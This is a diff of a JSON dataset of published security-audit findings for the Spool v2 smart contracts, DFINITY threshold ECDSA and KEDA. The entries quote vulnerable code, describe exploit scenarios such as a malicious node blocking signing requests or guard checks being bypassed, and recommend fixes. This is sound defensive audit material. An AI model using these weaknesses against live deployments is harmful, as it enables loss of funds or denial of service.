SpoolUtils.getExchangeRates(tokens, _priceFeedManager); _flushExchangeRates[smartVault][flushIndex].setValues(exchangeRates); uint256 [][] memory distribution = distributeDeposit ( DepositQueryBag1({ deposit: _vaultDeposits[smartVault][flushIndex].toArray(tokens.length) , exchangeRates: exchangeRates, allocation: allocation, strategyRatios: SpoolUtils.getStrategyRatiosAtLastDhw(strategies, _strategyRegistry) }) ); ... return _strategyRegistry.addDeposits(strategies, distribution) ; } Figure 9.2: A snippet of the flushSmartVault function in spool-v2-core/DepositManager.sol#L188L 226 Lastly, the _strategyRegistry.addDeposits function is called with the computed distribution, which adds the amounts to deploy in the next doHardWork function call in the _assetsDeposited variable (gure 9.3). function addDeposits( address [] calldata strategies_, uint256 [][] calldata amounts) { external onlyRole(ROLE_SMART_VAULT_MANAGER, msg.sender ) returns (uint16a16) uint16a16 indexes; for ( uint256 i; i < strategies_.length; ++i) { address strategy = strategies_[i]; uint256 latestIndex = _currentIndexes[strategy]; indexes = indexes.set(i, latestIndex); for ( uint256 j = 0; j < amounts[i].length; j++) { _assetsDeposited[strategy][latestIndex][j] += amounts[i][j]; } } return indexes; } Figure 9.3: The addDeposits function in spool-v2-core/StrategyRegistry.sol#L343L361 The next time the doHardWork function is called, it will transfer the equivalent of the last deposits amount instead of the sum of all deposits from the master wallet to the assigned strategy (gure 9.4). function doHardWork(DoHardWorkParameterBag calldata dhwParams) external whenNotPaused { ... // Transfer deposited assets to the strategy. for ( uint256 k; k < assetGroup.length; ++k) { if (_assetsDeposited[strategy][dhwIndex][k] > 0) { _masterWallet.transfer( IERC20(assetGroup[k]), strategy, _assetsDeposited[strategy][dhwIndex][k] ); } } ... Figure 9.4: A snippet of the doHardWork function in spool-v2-core/StrategyRegistry.sol#L222L3 41 Exploit Scenario Bob deploys a smart vault. One hundred deposits are made before a smart vault ush is invoked, but only the last deposits assets are deployed to the underlying strategies, severely impacting the smart vaults performance. Recommendations Short term, modify the depositAssets function so that it correctly tracks all deposits within a ush cycle, rather than just the last deposit. Long term, improve the systems unit and integration tests: test a smart vault with a single strategy and multiple strategies to ensure that smart vaults behave correctly when funds are deposited and deployed to the underlying strategies.", "labels": [ "Trail of Bits", "Severity: High", - "Difficulty: High" + "Difficulty: Low" ] }, { - "title": "1. Lack of validation of signed dealing against original dealing ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYThresholdECDSAandBtcCanisters.pdf", - "body": "The EcdsaPreSignerImpl::validate_dealing_support method does not check that the content of signed dealings matches the original dealings. A malicious receiver could exploit this lack of validation by changing the requested height (that is, the support.content.requested_height eld) or internal data (the support.content.idk_dealing.internal_dealing_raw eld) before signing the ECDSA dealing. The resulting signature would not be agged as invalid by the validate_dealing_support method but would result in an invalid aggregated signature. After all nodes sign a dealing, the EcdsaTranscriptBuilderImpl::build_transcript method checks the signed dealings content hashes before attempting to aggregate all the dealing support signatures to produce the nal aggregated signature. The method logs a warning when the hashes do not agree, but does not otherwise act on signed dealings with dierent content. let mut content_hash = BTreeSet::new(); for share in &support_shares { content_hash.insert(ic_crypto::crypto_hash(&share.content)); } if content_hash.len() > 1 { warn!( self.log, \"Unexpected multi share content: support_shares = {}, content_hash = {}\", support_shares.len(), content_hash.len() ); self.metrics.payload_errors_inc(\"invalid_content_hash\"); } if let Some(multi_sig) = self.crypto_aggregate_dealing_support( transcript_state.transcript_params, &support_shares, ) { } transcript_state.add_completed_dealing(signed_dealing.content, multi_sig); Figure 1.1: ic/rs/consensus/src/ecdsa/pre_signer.rs:1015-1034 The dealing content is added to the set of completed dealings along with the aggregated signature. When the node attempts to create a new transcript from the dealing, the aggregated signature is checked by IDkgProtocol::create_transcript. If a malicious receiver changes the content of a dealing before signing it, the resulting invalid aggregated signature would be rejected by this method. In such a case, the EcdsaTranscriptBuilderImpl methods build_transcript and get_completed_transcript would return None for the corresponding transcript ID. That is, neither the transcript nor the corresponding quadruple would be completed. Additionally, since signing requests are deterministically matched against quadruples, including quadruples that are not yet available, this issue could allow a single node to block the service of individual signing requests. pub(crate) fn get_signing_requests<'a>( ecdsa_payload: &ecdsa::EcdsaPayload, sign_with_ecdsa_contexts: &'a BTreeMap, ) -> BTreeMap { let known_random_ids: BTreeSet<[u8; 32]> = ecdsa_payload .iter_request_ids() .map(|id| id.pseudo_random_id) .collect::>(); let mut unassigned_quadruple_ids = ecdsa_payload.unassigned_quadruple_ids().collect::>(); // sort in reverse order (bigger to smaller). unassigned_quadruple_ids.sort_by(|a, b| b.cmp(a)); let mut new_requests = BTreeMap::new(); // The following iteration goes through contexts in the order // of their keys, which is the callback_id. Therefore we are // traversing the requests in the order they were created. for context in sign_with_ecdsa_contexts.values() { if known_random_ids.contains(context.pseudo_random_id.as_slice()) { continue; }; if let Some(quadruple_id) = unassigned_quadruple_ids.pop() { let request_id = ecdsa::RequestId { quadruple_id, pseudo_random_id: context.pseudo_random_id, }; new_requests.insert(request_id, context); } else { break; } } new_requests } Figure 1.2: ic/rs/consensus/src/ecdsa/payload_builder.rs:752-782 Exploit Scenario A malicious node wants to prevent the signing request SRi from completing. Assume that the corresponding quadruple, Qi, is not yet available. The node waits until it receives a dealing corresponding to quadruple Qi. It generates a support message for the dealing, but before signing the dealing, the malicious node changes the dealing.idk_dealing.internal_dealing_raw eld. The signature is valid for the updated dealing but not for the original dealing. The malicious dealing support is gossiped to the other nodes in the network. Since the signature on the dealing support is correct, all nodes move the dealing support to the validated pool. However, when the dealing support signatures are aggregated by the other nodes, the aggregated signature is rejected as invalid, and no new transcript is created for the dealing. This means that the quadruple Qi never completes. Since the matching of signing requests to quadruples is deterministic, SRi is matched with Qi every time a new ECDSA payload is created. Thus, SRi is never serviced. Recommendations Short term, add validation code in EcdsaPreSignerImpl::validate_dealing_support to verify that a signed dealings content hash is identical to the hash of the original dealing. Long term, consider whether the BLS multisignature aggregation APIs need to be better documented to ensure that API consumers verify that all individual signatures are over the same message.", + "title": "10. Risk of malformed calldata of calls to guard contracts ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The GuardManager contract does not pad custom values while constructing the calldata for calls to guard contracts. The calldata could be malformed, causing the aected guard contract to give incorrect results or to always revert calls. Guards for vaults are customizable checks that are executed on every user action. The result of a guard contract either approves or disapproves user actions. The GuardManager contract handles the logic to call guard contracts and to check their results (gure 10.1). function runGuards( address smartVaultId , RequestContext calldata context) external view { [...] bytes memory encoded = _encodeFunctionCall(smartVaultId, guard , context); ( bool success , bytes memory data) = guard.contractAddress.staticcall(encoded) ; _checkResult (success, data, guard.operator, guard.expectedValue, i); } } Figure 10.1: The runGuards function in spool-v2-core/GuardManager.sol#L19L33 The arguments of the runGuards function include information related to the given user action and custom values dened at the time of guard denition. The GuardManager.setGuards function initializes the guards in the GuardManager contract. Using the guard denition, the GuardManager contract manually constructs the calldata with the selected values from the user action information and the custom values (gure 10.2). function _encodeFunctionCall ( address smartVaultId , GuardDefinition memory guard, RequestContext memory context) internal pure returns ( bytes memory ) { [...] result = bytes .concat(result, methodID ); for ( uint256 i ; i < paramsLength; ++i) { GuardParamType paramType = guard.methodParamTypes[i]; if (paramType == GuardParamType.DynamicCustomValue) { result = bytes .concat(result, abi.encode(paramsEndLoc)); paramsEndLoc += 32 + guard.methodParamValues[customValueIdx].length ; customValueIdx++; } else if (paramType == GuardParamType.CustomValue) { result = bytes .concat(result, guard.methodParamValues[customValueIdx]); customValueIdx++; } [...] } customValueIdx = 0 ; for ( uint256 i ; i < paramsLength; ++i) { GuardParamType paramType = guard.methodParamTypes[i]; if (paramType == GuardParamType.DynamicCustomValue) { result = bytes .concat(result, abi.encode(guard.methodParamValues[customValueIdx].length / 32 )); result = bytes .concat(result, guard.methodParamValues[customValueIdx]); customValueIdx++; } else if (paramType == GuardParamType.CustomValue) { customValueIdx++; } [...] } return result; } Figure 10.2: The _encodeFunctionCall function in spool-v2-core/GuardManager.sol#L111L177 However, the contract concatenates the custom values without considering their lengths and required padding. If these custom values are not properly padded at the time of guard initialization, the call will receive malformed data. As a result, either of the following could happen: 1. Every call to the guard contract will always fail, and user action transactions will always revert. The smart vault using the guard will become unusable. 2. The guard contract will receive incorrect arguments and return incorrect results. Invalid user actions could be approved, and valid user actions could be rejected. Exploit Scenario Bob deploys a smart vault and creates a guard for it. The guard contract takes only one custom value as an argument. Bob created the guard denition in GuardManager without padding the custom value. Alice tries to deposit into the smart vault, and the guard contract is called for her action. The call to the guard contract fails, and the transaction reverts. The smart vault is unusable. Recommendations Short term, modify the associated code so that it veries that custom values are properly padded before guard denitions are initialized in GuardManager.setGuards . Long term, avoid implementing low-level manipulations. If such implementations are unavoidable, carefully review the Solidity documentation before implementing them to ensure that they are implemented correctly. Additionally, improve the user documentation with necessary technical details to properly use the system.", "labels": [ "Trail of Bits", "Severity: Low", @@ -4662,9 +7330,9 @@ ] }, { - "title": "2. The ECDSA payload is not updated if a quadruple fails to complete ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYThresholdECDSAandBtcCanisters.pdf", - "body": "If a transcript fails to complete (as described in TOB-DFTECDSA-1), the corresponding quadruple, Qi, will also fail to complete. This means that the quadruple ID for Qi will remain in the quadruples_in_creation set until the key is reshared and the set is purged. (Currently, the key is reshared if a node joins or leaves the subnet, which is an uncommon occurrence.) Moreover, if a transcript and the corresponding Qi fail to complete, so will the corresponding signing request, SRi, as it is matched deterministically with Qi. let ecdsa_payload = ecdsa::EcdsaPayload { signature_agreements: ecdsa_payload.signature_agreements.clone(), ongoing_signatures: ecdsa_payload.ongoing_signatures.clone(), available_quadruples: if is_new_key_transcript { BTreeMap::new() } else { ecdsa_payload.available_quadruples.clone() }, quadruples_in_creation: if is_new_key_transcript { BTreeMap::new() } else { ecdsa_payload.quadruples_in_creation.clone() }, uid_generator: ecdsa_payload.uid_generator.clone(), idkg_transcripts: BTreeMap::new(), ongoing_xnet_reshares: if is_new_key_transcript { // This will clear the current ongoing reshares, and // the execution requests will be restarted with the // new key and different transcript IDs. BTreeMap::new() } else { ecdsa_payload.ongoing_xnet_reshares.clone() }, xnet_reshare_agreements: ecdsa_payload.xnet_reshare_agreements.clone(), }; Figure 2.1: The quadruples_in_creation set will be purged only when the key is reshared. The canister will never be notied that the signing request failed and will be left waiting indenitely for the corresponding reply from the distributed signing service. Recommendations Short term, revise the code so that if a transcript (permanently) fails to complete, the quadruple ID and corresponding transcripts are dropped from the ECDSA payload. To ensure that a malicious node cannot inuence how signing requests are matched with quadruples, revise the code so that it noties the canister that the signing request failed.", + "title": "11. GuardManager does not account for all possible types when encoding guard arguments ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "While encoding arguments for guard contracts, the GuardManager contract assumes that all static types are encoded to 32 bytes. This assumption does not hold for xed-size static arrays and structs with only static type members. As a result, guard contracts could receive incorrect arguments, leading to unintended behavior. The GuardManager._encodeFunctionCall function manually encodes arguments to call guard contracts (gure 11.1). function _encodeFunctionCall ( address smartVaultId , GuardDefinition memory guard, RequestContext memory context) internal pure returns ( bytes memory ) { bytes4 methodID = bytes4 ( keccak256 (abi.encodePacked(guard.methodSignature))); uint256 paramsLength = guard.methodParamTypes.length ; bytes memory result = new bytes ( 0 ); result = bytes .concat(result, methodID); uint16 customValueIdx = 0 ; uint256 paramsEndLoc = paramsLength * 32 ; // Loop through parameters and // - store values for simple types // - store param value location for dynamic types for ( uint256 i ; i < paramsLength; ++i) { GuardParamType paramType = guard.methodParamTypes[i]; if (paramType == GuardParamType.DynamicCustomValue) { result = bytes .concat(result, abi.encode( paramsEndLoc )); paramsEndLoc += 32 + guard.methodParamValues[customValueIdx].length; customValueIdx++; } else if (paramType == GuardParamType.CustomValue) { result = bytes .concat(result, guard.methodParamValues[customValueIdx]); customValueIdx++; } [...] } else if (paramType == GuardParamType.Assets) { result = bytes .concat(result, abi.encode( paramsEndLoc )); paramsEndLoc += 32 + context.assets.length * 32 ; } else if (paramType == GuardParamType.Tokens) { result = bytes .concat(result, abi.encode( paramsEndLoc )); paramsEndLoc += 32 + context.tokens.length * 32 ; } else { revert InvalidGuardParamType( uint256 (paramType)); } } [...] return result; } Figure 11.1: The _encodeFunctionCall function in spool-v2-core/GuardManager.sol#L111L177 The function calculates the oset for dynamic type arguments assuming that every parameter, static or dynamic, takes exactly 32 bytes. However, xed-length static type arrays and structs with only static type members are considered static. All static type values are encoded in-place, and static arrays and static structs could take more than 32 bytes. As a result, the calculated oset for the start of dynamic type arguments could be wrong, which would cause incorrect values for these arguments to be set, resulting in unintended behavior. For example, the guard could approve invalid user actions and reject valid user actions or revert every call. Exploit Scenario Bob deploys a smart vault and creates a guard contract that takes the custom value of a xed-length static array type. The guard contract uses RequestContext assets. Bob correctly creates the guard denition in GuardManager , but the GuardManager._encodeFunctionCall function incorrectly encodes the arguments. The guard contract fails to decode the arguments and always reverts the execution. Recommendations Short term, modify the GuardManager._encodeFunctionCall function so that it considers the encoding length of the individual parameters and calculates the osets correctly. Long term, avoid implementing low-level manipulations. If such implementations are unavoidable, carefully review the Solidity documentation before implementing them to ensure that they are implemented correctly.", "labels": [ "Trail of Bits", "Severity: Low", @@ -4672,179 +7340,159 @@ ] }, { - "title": "3. Malicious canisters can exhaust the number of available quadruples ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYThresholdECDSAandBtcCanisters.pdf", - "body": "By requesting a large number of signatures, a canister (or set of canisters) could exhaust the number of available quadruples, preventing other signature requests from completing in a timely manner. The ECDSA payload builder defaults to creating one extra quadruple in create_data_payload if there is no ECDSA conguration for the subnet in the registry. let ecdsa_config = registry_client .get_ecdsa_config(subnet_id, summary_registry_version)? .unwrap_or(EcdsaConfig { quadruples_to_create_in_advance: 1, // default value ..EcdsaConfig::default() }); Figure 3.1: ic/rs/consensus/src/ecdsa/payload_builder.rs:400-405 Signing requests are serviced by the system in the order in which they are made (as determined by their CallbackID values). If a canister (or set of canisters) makes a large number of signing requests, the system would be overwhelmed and would take a long time to recover. This issue is partly mitigated by the fee that is charged for signing requests. However, we believe that the nancial ramications of this problem could outweigh the fees paid by attackers. For example, the type of denial-of-service attack described in this nding could be devastating for a DeFi application that is sensitive to small price uctuations in the Bitcoin market. Since the ECDSA threshold signature service is not yet deployed on the Internet Computer, it is unclear how the service will be used in practice, making the severity of this issue dicult to determine. Therefore, the severity of this issue is marked as undetermined. Exploit Scenario A malicious canister learns that another canister on the Internet Computer is about to request a time-sensitive signature on a message. The malicious canister immediately requests a large number of signatures from the signing service, exhausting the number of available quadruples and preventing the original signature from completing in a timely manner. Recommendations One possible mitigation is to increase the number of quadruples that the system creates in advance, making it more expensive for an attacker to carry out a denial-of-service attack on the ECDSA signing service. Another possibility is to run multiple signing services on multiple subnets of the Internet Computer. This would have the added benet of protecting the system from resource exhaustion related to cross-network bandwidth limitations. However, both of these solutions scale only linearly with the number of added quadruples/subnets. Another potential mitigation is to introduce a dynamic fee or stake based on the number of outstanding signing requests. In the case of a dynamic fee, the canister would pay a set number of tokens proportional to the number of outstanding signing requests whenever it requests a new signature from the service. In the case of a stake-based system, the canister would stake funds proportional to the number of outstanding requests but would recover those funds once the signing request completed. As any signing service that depends on consensus will have limited throughput compared to a centralized service, this issue is dicult to mitigate completely. However, it is important that canister developers are aware of the limits of the implementation. Therefore, regardless of the mitigations imposed, we recommend that the DFINITY team clearly document the limits of the current implementation.", - "labels": [ - "Trail of Bits", - "Severity: Medium", - "Difficulty: High" - ] - }, - { - "title": "4. Aggregated signatures are dropped if their request IDs are not recognized ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYThresholdECDSAandBtcCanisters.pdf", - "body": "The update_signature_agreements function populates the set of completed signatures in the ECDSA payload. The function aggregates the completed signatures from the ECDSA pool by calling EcdsaSignatureBuilderImpl::get_completed_signatures. However, if a signatures associated signing request ID is not in the set of ongoing signatures, update_signature_agreements simply drops the signature. for (request_id, signature) in builder.get_completed_signatures( chain, ecdsa_pool.deref() ) { if payload.ongoing_signatures.remove(&request_id).is_none() { warn!( log, \"ECDSA signing request {:?} is not found in payload but we have a signature for it\", request_id ); } else { payload .signature_agreements .insert(request_id, ecdsa::CompletedSignature::Unreported(signature)); } } Figure 4.1: ic/rs/consensus/src/ecdsa/payload_builder.rs:817-830 Barring an implementation error, this should not happen under normal circumstances. Recommendations Short term, consider adding the signature to the set of completed signatures on the next ECDSA payload. This will ensure that all outstanding signing requests are completed. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", + "title": "12. Use of encoded values in guard contract comparisons could lead to opposite results ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The GuardManager contract compares the return value of a guard contract to an expected value. However, the contract uses encoded versions of these values in the comparison, which could lead to incorrect results for signed values with numerical comparison operators. The GuardManager contract calls the guard contract and validates the return value using the GuardManager._checkResult function (gure 12.1). function _checkResult ( bool success , bytes memory returnValue, bytes2 operator, bytes32 value , uint256 guardNum ) internal pure { if (!success) revert GuardError(); bool result = true ; if (operator == bytes2( \"==\" )) { result = abi.decode(returnValue, ( bytes32 )) == value; } else if (operator == bytes2( \"<=\" )) { result = abi.decode(returnValue, ( bytes32 )) <= value; } else if (operator == bytes2( \">=\" )) { result = abi.decode(returnValue, ( bytes32 )) >= value; } else if (operator == bytes2( \"<\" )) { result = abi.decode(returnValue, ( bytes32 )) < value; } else if (operator == bytes2( \">\" )) { result = abi.decode(returnValue, ( bytes32 )) > value; } else { result = abi.decode(returnValue, ( bool )); } if (!result) revert GuardFailed(guardNum); } Figure 12.1: The _checkResult function in spool-v2-core/GuardManager.sol#L80L105 When a smart vault creator denes a guard using the GuardManager.setGuards function, they dene a comparison operator and the expected value, which the GuardManager contract uses to compare with the return value of the guard contract. The comparison is performed on the rst 32 bytes of the ABI-encoded return value and the expected value, which will cause issues depending on the return value type. First, the numerical comparison operators ( < , > , <= , >= ) are not well dened for bytes32 ; therefore, the contract treats encoded values with padding as uint256 values before comparing them. This way of comparing values gives incorrect results for negative values of the int type. The Solidity documentation includes the following description about the encoding of int type values: int: enc(X) is the big-endian twos complement encoding of X, padded on the higher-order (left) side with 0x bytes for negative X and with zero-bytes for non-negative X such that the length is 32 bytes. Figure 12.2: A description about the encoding of int type values in the Solidity documentation Because negative values are padded with 0xff and positive values with 0x00 , the encoded negative values will be considered greater than the encoded positive values. As a result, the result of the comparison will be the opposite of the expected result. Second, only the rst 32 bytes of the return value are considered for comparison. This will lead to inaccurate results for return types that use more than 32 bytes to encode the value. Exploit Scenario Bob deploys a smart vault and intends to allow only users who own B NFTs to use it. B NFTs are implemented using ERC-1155. Bob uses the B contract as a guard with the comparison operator > and an expected value of 0 . Bob calls the function B.balanceOfBatch to fetch the NFT balance of the user. B.balanceOfBatch returns uint256[] . The rst 32 bytes of the return data contain the oset into the return data, which is always nonzero. The comparison passes for every user regardless of whether they own a B NFT. As a result, every user can use Bobs smart vault. Recommendations Short term, restrict the return value of a guard contract to a Boolean value. If that is not possible, document the limitations and risks surrounding the guard contracts. Additionally, consider manually checking new action guards with respect to these limitations. Long term, avoid implementing low-level manipulations. If such implementations are unavoidable, carefully review the Solidity documentation before implementing them to ensure that they are implemented correctly.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: High" + "Severity: Low", + "Difficulty: Medium" ] }, { - "title": "1. Use of fmt.Sprintf to build host:port string ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", - "body": "Several scalers use a construct like fmt.Sprintf(\"%s:%s\", host, port) to create a host:port address string from a user-supplied host and port. This approach is problematic when the host is a literal IPv6 address, which should be enclosed in square brackets when the address is part of a resource identier. An address created using simple string concatenation, such as with fmt.Sprintf , may fail to parse when given to Go standard library functions. The following source les incorrectly use fmt.Sprintf to create an address: pkg/scalers/cassandra_scaler.go:115 pkg/scalers/mongo_scaler.go:191 pkg/scalers/mssql_scaler.go:220 pkg/scalers/mysql_scaler.go:149 pkg/scalers/predictkube_scaler.go:128 pkg/scalers/redis_scaler.go:296 pkg/scalers/redis_scaler.go:364 Recommendations Short term, use net.JoinHostPort instead of fmt.Sprintf to construct network addresses. The documentation for the net package states the following: JoinHostPort combines host and port into a network address of the form host:port . If host contains a colon, as found in literal IPv6 addresses, then JoinHostPort returns [host]:port . Long term, use Semgrep and the sprintf-host-port rule of semgrep-go to detect future instances of this issue. 2. MongoDB scaler does not encode username and password in connection string Severity: Low Diculty: Low Type: Data Validation Finding ID: TOB-KEDA-2 Target: pkg/scalers/mongo_scaler.go", + "title": "13. Lack of contract existence checks on low-level calls ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The GuardManager and Swapper contracts use low-level calls without contract existence checks. If the target address is incorrect or the contract at that address is destroyed, a low-level call will still return success. The Swapper.swap function uses the address().call(...) function to swap tokens (gure 13.1). function swap ( address [] calldata tokensIn, SwapInfo[] calldata swapInfo, address [] calldata tokensOut, address receiver ) external returns ( uint256 [] memory tokenAmounts) { // Perform the swaps. for ( uint256 i ; i < swapInfo.length; ++i) { if (!exchangeAllowlist[swapInfo[i].swapTarget]) { revert ExchangeNotAllowed(swapInfo[i].swapTarget); } _approveMax(IERC20(swapInfo[i].token), swapInfo[i].swapTarget); ( bool success , bytes memory data) = swapInfo[i].swapTarget.call(swapInfo[i].swapCallData); if (!success) revert (SpoolUtils.getRevertMsg(data)); } // Return unswapped tokens. for ( uint256 i ; i < tokensIn.length; ++i) { uint256 tokenInBalance = IERC20(tokensIn[i]).balanceOf( address ( this )); if (tokenInBalance > 0 ) { IERC20(tokensIn[i]).safeTransfer(receiver, tokenInBalance); } } Figure 13.1: The swap function in spool-v2-core/Swapper.sol#L29L45 The Solidity documentation includes the following warning: The low-level functions call, delegatecall and staticcall return true as their rst return value if the account called is non-existent, as part of the design of the EVM. Account existence must be checked prior to calling if needed. Figure 13.2: The Solidity documentation details the necessity of executing existence checks before performing low-level calls. Therefore, if the swapTarget address is incorrect or the target contract has been destroyed, the execution will not revert even if the swap is not successful. We rated this nding as only a low-severity issue because the Swapper contract transfers the unswapped tokens to the receiver if a swap is not successful. However, the CompoundV2Strategy contract uses the Swapper contract to exchange COMP tokens for underlying tokens (gure 13.3). function _compound( address [] calldata tokens, SwapInfo[] calldata swapInfo, uint256 [] calldata ) internal override returns ( int256 compoundedYieldPercentage) { if (swapInfo.length > 0) { address [] memory markets = new address [](1); markets[0] = address (cToken); comptroller.claimComp( address ( this ), markets); uint256 compBalance = comp.balanceOf(address(this)); if (compBalance > 0) { comp.safeTransfer(address(swapper), compBalance); address [] memory tokensIn = new address [](1); tokensIn[0] = address(comp); uint256 swappedAmount = swapper.swap(tokensIn, swapInfo, tokens, address(this))[0]; if ( swappedAmount > 0) { uint256 cTokenBalanceBefore = cToken.balanceOf( address ( this )); _depositToCompoundProtocol (IERC20(tokens[0]), swappedAmount); uint256 cTokenAmountCompounded = cToken.balanceOf( address ( this )) - cTokenBalanceBefore; _calculateYieldPercentage(cTokenBalanceBefore, cTokenAmountCompounded); compoundedYieldPercentage = } } } } Figure 13.3: The _compound function in spool-v2-core/CompoundV2Strategy.sol If the swap operation fails, the COMP will stay in CompoundV2Strategy . This will cause users to lose the yield they would have gotten from compounding. Because the swap operation fails silently, the do hard worker may not notice that yield is not compounding. As a result, users will receive less in prot than they otherwise would have. The GuardManager.runGuards function, which uses the address().staticcall() function, is also aected by this issue. However, the return value of the call is decoded, so the calls would not fail silently. Exploit Scenario The Spool team deploys CompoundV2Strategy with a market that gives COMP tokens to its users. While executing the doHardWork function for smart vaults using CompoundV2Strategy , the do hard worker sets the swapTarget address to an incorrect address. The swap operation to exchange COMP to the underlying token fails silently. The gained yield is not deposited into the market. The users receive less in prot. Recommendations Short term, implement a contract existence check before the low-level calls in GuardManager.runGuards and Swapper.swap . Long term, avoid implementing low-level calls. If such calls are unavoidable, carefully review the Solidity documentation , particularly the Warnings section, before implementing them to ensure that they are implemented correctly.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: High" ] }, { - "title": "3. Prometheus metrics server does not support TLS ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", - "body": "The KEDA Metrics Adapter exposes Prometheus metrics on an HTTP server listening on port 9022. Though Prometheus supports scraping metrics over TLS-enabled connections, KEDA does not oer TLS for this server. The function responsible for starting the HTTP server, prommetrics.NewServer , does so using the http.ListenAndServe function, which does not enable TLS. func (metricsServer PrometheusMetricServer) NewServer(address string , pattern string ) { http.HandleFunc( \"/healthz\" , func (w http.ResponseWriter, _ *http.Request) { w.WriteHeader(http.StatusOK) _, err := w.Write([] byte ( \"OK\" )) if err != nil { log.Fatalf( \"Unable to write to serve custom metrics: %v\" , err) } }) log.Printf( \"Starting metrics server at %v\" , address) http.Handle(pattern, promhttp.HandlerFor(registry, promhttp.HandlerOpts{})) // initialize the total error metric _, errscaler := scalerErrorsTotal.GetMetricWith(prometheus.Labels{}) if errscaler != nil { log.Fatalf( \"Unable to initialize total error metrics as : %v\" , errscaler) } log.Fatal( http.ListenAndServe(address, nil ) ) } Figure 3.1: prommetrics.NewServer exposes Prometheus metrics without TLS ( pkg/prommetrics/adapter_prommetrics.go#L82-L99 ). Exploit Scenario A user sets up KEDA with Prometheus integration, enabling the scraping of metrics on port 9022. When Prometheus makes a connection to the server, it is unencrypted, leaving both the request and response vulnerable to interception and tampering in transit. As KEDA does not support TLS for the server, the user has no way to ensure the condentiality and integrity of these metrics. Recommendations Short term, provide a ag to enable TLS for Prometheus metrics exposed by the Metrics Adapter. The usual way to enable TLS for an HTTP server is using the http.ListenAndServeTLS function.", + "title": "14. Incorrect use of exchangeRates in doHardWork ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The StrategyRegistry contracts doHardWork function fetches the exchangeRates for all of the tokens involved in the do hard work process, and then it iterates over the strategies and saves the exchangeRates values for the current strategys tokens in the assetGroupExchangeRates variable; however, when doHardWork is called for a strategy, the exchangeRates variable rather than the assetGroupExchangeRates variable is passed, resulting in the use of incorrect exchange rates. function doHardWork(DoHardWorkParameterBag calldata dhwParams) external whenNotPaused { ... // Get exchange rates for tokens and validate them against slippages. uint256 [] memory exchangeRates = SpoolUtils.getExchangeRates(dhwParams.tokens, _priceFeedManager); for ( uint256 i; i < dhwParams.tokens.length; ++i) { if ( exchangeRates[i] < dhwParams.exchangeRateSlippages[i][0] || exchangeRates[i] > dhwParams.exchangeRateSlippages[i][1] revert ExchangeRateOutOfSlippages(); ) { } } ... // Get exchange rates for this group of strategies. uint256 assetGroupId = IStrategy(dhwParams.strategies[i][0]).assetGroupId(); address [] memory assetGroup = IStrategy(dhwParams.strategies[i][0]).assets(); uint256 [] memory assetGroupExchangeRates = new uint256 [](assetGroup.length); for (uint256 j; j < assetGroup.length; ++j) { bool found = false ; for ( uint256 k; k < dhwParams.tokens.length; ++k) { if (assetGroup[j] == dhwParams.tokens[k]) { assetGroupExchangeRates[j] = exchangeRates[k]; found = true ; break ; } } ... // Do the hard work on the strategy. DhwInfo memory dhwInfo = IStrategy(strategy).doHardWork( StrategyDhwParameterBag({ swapInfo: dhwParams.swapInfo[i][j], compoundSwapInfo: dhwParams.compoundSwapInfo[i][j], slippages: dhwParams.strategySlippages[i][j], assetGroup: assetGroup, exchangeRates: exchangeRates , withdrawnShares: _sharesRedeemed[strategy][dhwIndex], masterWallet: address(_masterWallet), priceFeedManager: _priceFeedManager, baseYield: dhwParams.baseYields[i][j], platformFees: platformFeesMemory }) ); // Bookkeeping. _dhwAssetRatios[strategy] = IStrategy(strategy).assetRatio(); _exchangeRates[strategy][dhwIndex].setValues( exchangeRates ); ... Figure 14.1: A snippet of the doHardWork function in spool-v2-core/StrategyRegistry.sol#L222L 341 The exchangeRates values are used by a strategys doHardWork function to calculate how many assets in USD value are to be deposited and how many in USD value are currently deposited in the strategy. As a consequence of using exchangeRates rather than assetGroupExchangeRates , the contract will return incorrect values. Additionally, the _exchangeRates variable is returned by the strategyAtIndexBatch function, which is used when simulating deposits. Exploit Scenario Bob deploys a smart vault, and users start depositing into it. However, the rst time doHardWork is called, they notice that the deposited assets and the reported USD value deposited into the strategies are incorrect. They panic and start withdrawing all of the funds. Recommendations Short term, replace exchangeRates with assetGroupExchangeRates in the relevant areas of doHardWork and where it sets the _exchangeRates variable. Long term, improve the systems unit and integration tests to verify that the deposited value in a strategy is the expected amount. Additionally, when reviewing the code, look for local variables that are set but then never used; this is a warning sign that problems may arise.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: High", + "Difficulty: Low" ] }, { - "title": "4. Return value is dereferenced before error check ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", - "body": "After certain calls to http.NewRequestWithContext , the *Request return value is dereferenced before the error return value is checked (see the highlighted lines in gures 4.1 and 4.2). checkTokenRequest, err := http.NewRequestWithContext(ctx, \"HEAD\" , tokenURL.String(), nil ) checkTokenRequest.Header.Set( \"X-Subject-Token\" , token) checkTokenRequest.Header.Set( \"X-Auth-Token\" , token) if err != nil { return false , err } Figure 4.1: pkg/scalers/openstack/keystone_authentication.go#L118-L124 req, err := http.NewRequestWithContext(ctx, \"GET\" , url, nil ) req.SetBasicAuth(s.metadata.username, s.metadata.password) req.Header.Set( \"Origin\" , s.metadata.corsHeader) if err != nil { return - 1 , err } Figure 4.2: pkg/scalers/artemis_scaler.go#L241-L248 If an error occurred in the call to NewRequestWithContext , this 